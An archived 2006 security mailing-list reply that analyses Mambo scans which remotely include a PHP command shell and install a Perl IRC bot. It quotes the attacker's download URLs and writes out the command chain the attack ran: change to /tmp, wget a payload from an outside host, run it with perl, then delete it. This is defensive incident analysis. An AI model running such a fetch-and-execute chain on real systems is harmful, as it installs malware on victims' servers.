|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: High volume of Mambo scans (perlb0t)
From: Peter Kosinar (goober
ksp.sk)
Date: Mon May 15 2006 - 12:26:29 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hello,
> I was looking at the scripts they try to download and
> it does not looks like a common perl bot (connecting
> to irc). It's also written in php and by a brazilian
> person (comments in portuguese) and with a terrible
> code :) I didn't have time to fully look at it,
> though.
>
> These are the pages they access:
>
> http://usuarios.lycos.es/athos666/d25/
> http://usuarios.lycos.es/athos666/d25/therules25.dat
> http://radius01.comete.ci/tool.gif
Actually, the tool.gif file (and the other parts of it) is just the first
level of the attack machinery -- it's _the_ PHP script which actually gets
remotely included and it understands some simple commands and displays
the results in nice form. In this particular case, the interesting
argument is "cmd=..." which executes the given command.
As you can see from the remaining portion of the request, the executed
compound command in this case consisted of:
1) cd /tmp
2) wget http://radius01.comete.ci/session.gif
3) perl session.gif
4) rm -rf session.*
The session.gif file is the Perlbot I and other posters mentioned.
Peter
--
[Name] Peter Kosinar [Quote] 2B | ~2B = exp(i*PI) [ICQ] 134813278
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]